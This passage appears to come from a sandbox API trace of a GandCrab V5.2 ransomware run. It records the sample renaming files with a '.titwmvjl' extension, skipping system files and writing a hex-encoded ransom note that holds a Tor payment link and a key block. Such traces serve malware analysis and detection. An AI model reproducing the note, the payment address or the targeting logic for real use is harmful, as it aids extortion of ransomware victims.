param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a09d2ca4deb61a.lock") returned 83 [0072.950] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\powerpoint\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.950] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.950] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 59 [0072.950] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0072.950] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5036f8 [0072.951] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.951] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.951] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.951] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.951] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.951] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.951] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.951] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a09d2ca4deb61a.lock" [0072.951] lstrlenW (lpString=".titwmvjl") returned 9 [0072.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a09d2ca4deb61a.lock") returned 83 [0072.951] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.951] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 92 [0072.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\d2ca4a09d2ca4deb61a.lock") returned 83 [0072.951] lstrlenW (lpString=".lock") returned 5 [0072.951] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.951] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.952] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.952] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.952] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.952] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.952] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.952] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\TITWMVJL-DECRYPT.txt" [0072.952] lstrlenW (lpString=".titwmvjl") returned 9 [0072.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\TITWMVJL-DECRYPT.txt") returned 79 [0072.952] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.952] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 88 [0072.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\TITWMVJL-DECRYPT.txt") returned 79 [0072.952] lstrlenW (lpString=".txt") returned 4 [0072.952] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.952] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.952] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.952] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.953] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\TITWMVJL-DECRYPT.txt") returned 79 [0072.953] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\TITWMVJL-DECRYPT.txt") returned 79 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.953] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.953] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.953] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.953] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0072.953] CloseHandle (hObject=0x2bc) returned 1 [0072.953] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.953] lstrcmpW (lpString1="Proof", lpString2=".") returned 1 [0072.953] lstrcmpW (lpString1="Proof", lpString2="..") returned 1 [0072.953] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Proof" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof" [0072.953] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\" [0072.954] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.954] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.954] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.954] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.954] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.954] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.955] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.955] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\\\TITWMVJL-DECRYPT.txt") returned 75 [0072.955] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\proof\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.956] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x5